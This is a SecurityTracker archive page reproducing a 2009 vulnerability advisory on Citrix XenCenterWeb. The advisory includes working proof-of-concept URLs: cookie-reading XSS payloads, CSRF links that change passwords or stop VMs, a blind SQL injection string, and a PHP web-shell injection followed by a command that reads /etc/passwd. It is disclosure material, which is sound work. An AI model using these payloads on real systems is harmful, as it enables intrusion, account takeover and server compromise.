Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Citrix XenCenterWeb Multiple Flaws Permit Cross-Site Scripting, SQL Injection, and Remote Command Execution Attacks
|
|
SecurityTracker Alert ID: 1022520
|
|
SecurityTracker URL: http://securitytracker.com/id?1022520
|
|
CVE Reference: CVE-2009-3757
, CVE-2009-3758
, CVE-2009-3759
, CVE-2009-3760
(Links to External Site)
|
Updated: Oct 28 2009
|
Original Entry Date: Jul 7 2009
|
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
|
Exploit Included: Yes
|
Description: Several vulnerabilities were reported in Citrix XenCenterWeb. A remote user can execute arbitrary code on the target system. A remote user can conduct cross-site scripting attacks. A remote user can inject SQL commands.
A remote user can invoke the '/var/www/config/writeconfig.php' script (or cause a target user to invoke the script) to write arbitrary
data to '/usr/local/lib/php/include/config.ini.php' and then access the console script to cause the data to be executed. The code
will be executed with the privileges of the target web service.
Several scripts do not properly filter HTML code from user-supplied
input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause
arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Citrix
XenCenterWeb software and will run in the security context of that site. As a result, the code will be able to access the target
user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target
user via web form to the site, or take actions on the site acting as the target user.
The username parameter in 'edituser.php'
is affected. The 'location', 'vmname', and 'sessionid' parameters in 'console.php' are affected.
Other parameters and scripts
are affected.
The 'login.php' script does not properly validate user-supplied input in the 'username' parameter. A remote user
can supply a specially crafted parameter value to execute SQL commands on the underlying database.
A demonstration exploit URL
is provided:
https://[target]/login.php?username=user' UNION SELECT if(user() LIKE
'root@%', benchmark(1000000,sha1('test')),
'false')/*
The vendor was notified on June 1, 2009.
Alberto Trivero and Claudio Criscione of Secure Network reported these
vulnerabilities.
The original advisory is available at:
http://securenetwork.it/ricerca/advisory/download/SN-2009-01.txt
[Editor's
note: The vendor has clarified that the affected software is sample code that was included in the XenServer Resource Kit. The
code is no longer available and is not supported.]
|
Impact: A remote user can execute arbitrary code on the target system.
A remote user can access the target user's cookies (including authentication
cookies), if any, associated with the site running the Citrix XenCenterWeb software, access data recently submitted by the target
user via web form to the site, or take actions on the site acting as the target user.
A remote user can execute SQL commands
on the underlying database.
|
Solution: No solution was available at the time of this entry.
[Editor's note: The vendor has clarified that the affected software is sample
code that was included in the XenServer Resource Kit. The code is no longer available and is not supported.]
|
Vendor URL: www.citrix.com/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Reported By: Claudio Criscione <c.criscione@securenetwork.it>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 7 Jul 2009 16:59:16 +0200
From: Claudio Criscione <c.criscione@securenetwork.it>
Subject: Citrix XenCenterWeb Multiple Vulnerabilities
|
Secure Network - Security Research Advisory
Vuln name: Citrix XenCenterWeb Multiple Vulnerabilities
Systems affected: Citrix XenCenterWeb
Systems not affected: n/a
Severity: High
Local/Remote: Remote
Vendor URL: http://www.citrix.com
Author(s): Alberto Trivero a.trivero@securenetwork.it -
Claudio Criscione c.criscione@securenetwork.it
Vendor disclosure: 1/06/2009
Vendor acknowledged: 11/06/2009
Vendor patch release: n/a
Public disclosure: 06/07/2009
Advisory number: SN-2009-01
Advisory URL: http://securenetwork.it/ricerca/advisory/download/SN-2009-01.txt
*** SUMMARY ***
Citrix XenCenterWeb is a web interface for Citrix XenServer environment
management.
Users of XenCenterWeb will be able to see a list of Virtual Machines in the
Resource Pool, perform life-cycle actions (start, shutdown, restart, etc.),
get basic information about the hosts in the Resource Pools, information about
the VMs and also connect to the console of the VMs.
Due to poor validation of some user controlled inputs, a variety of attacks
against the application and the underlying server are possible.
Cross-site scripting, cross-site request forgery, SQL injection and remote
command execution attack vectors were identified as well.
XSS and CSRF attacks can be performed on the virtual appliance itself, while
the others require the PHP parameter magic_quotes_gpc to be off on the web
server.
*** VULNERABILITY DETAILS ***
(a) Cross-site Scripting (XSS) and Cross-site Request Forgery (CSRF)
With the default PHP configuration (register_globals=Off and
magic_quotes_gpc=On), both XSS and CSRF attacks can be executed.
The first XSS attack exploits the lack of sanitization in the username
parameter in edituser.php script and requires the victim to be able to access
configuration scripts:
https://xencenterweb.loc/config/edituser.php?username=1<script>alert(document.cookie)</scrip
t>
Under the same conditions, a CSRF attack can be executed to change the
password of an arbitrary user:
https://xencenterweb.loc/config/changepw.php?username=[victim_username]&newpass=[attacker's_chose
n_pwd]
Another CSRF attack can hard stop a VM of the attacker's choice:
https://xencenterweb.loc/hardstopvm.php?stop_vmref=[VMref]&stop_vmname=[VMname]
Other XSS vulnerabilities afflict scripts which are accessible by anyone:
https://xencenterweb.loc/console.php?location=1"><script>alert(document.cookie)</scr
ipt><"&vmname=myVM
https://xencenterweb.loc/console.php?location=1&sessionid=1"><script>alert(123)<
/script><"&vmname=myVM
https://xencenterweb.loc/console.php?location=1&sessionid=1&vmname=myVM<script>alert(12
3)</script>
https://xencenterweb.loc/forcerestart.php?vmrefid=1"><script>alert(123)</script><"&
vmname=myVM
https://xencenterweb.loc/forcerestart.php?vmrefid=1&vmname=myVM"><script>alert(123)<
/script><"
https://xencenterweb.loc/forcesd.php?vmrefid=1&vmname=myVM"><script>alert(123)</
script><"
https://xencenterweb.loc/forcesd.php?vmrefid=1"><script>alert(123)</script><"&
vmname=myVM
(b) SQL Injection
The username parameter in the login.php script is vulnerable to a Blind SQL
Injection attack.
An attacker can retrieve the whole database schema through specially crafted
requests.
Here is an example proof of concept:
https://xencenterweb.loc/login.php?username=user' UNION SELECT if(user() LIKE
'root@%', benchmark(1000000,sha1('test')), 'false')/*
Obviously, other high profile attacks can be performed through this attack
vector.
(c) Remote Command Execution
An attacker could write arbitrary data in the file
/usr/local/lib/php/include/config.ini.php
through the file /var/www/config/writeconfig.php. Due to this unsecure behavior,
arbitrary commands can be executed on the machine.
If a victim with the proper authorization follows this link:
https://xencenterweb.loc/config/writeconfig.php?pool1='; ?> <?php $cmd =
$_REQUEST['cmd']; passthru($cmd); ?> <?php $xen = '
or this URL encoded version:
https://xencenterweb.loc/config/writeconfig.php?pool1=%27%3B%20%3F%3E%20%3C%3Fphp%20%24cmd%20%3D%20%2
4_REQUEST%5B%27cmd%27%5D%3B%20passthru%28%24cmd%29%3B%20%3F%3E%20%3C%3Fphp%20%24xen%20%3D%20%27
an attacker can then simply execute commands on the system through the
console.php file:
https://xencenterweb.loc/console.php?cmd=cat%20/etc/passwd;
*** EXPLOIT ***
Attackers may exploit these issues through a common browser as explained
above.
*** FIX INFORMATION ***
No patch is currently provided by Citrix, and the application download has
been removed.
Citrix officially stated that "the tool was created to demonstrate how the SDK
could be used to create unique solutions. Customers currently using it should
assess the risks of continued use in light of your findings and, if these prove
to be unacceptable, discontinue usage".
*** WORKAROUNDS ***
Common web application workarounds apply, like virtual patching from a web
application firewall or similar solutions. However most of the reported issues
can be mitigated by running the application only inside the virtual appliance
or in properly configured web servers.
Secure Network would like to thank Citrix for its support during the
disclosure process.
*********************
*** LEGAL NOTICES ***
*********************
Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.
We are committed to open, full disclosure of vulnerabilities, cooperating
whenever possible with software developers for properly handling disclosure.
This advisory is copyright 2009 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network.
The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.
E-mail: securenetwork {at} securenetwork.it
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24126788
|
|
Go to the Top of This SecurityTracker Archive Page
|
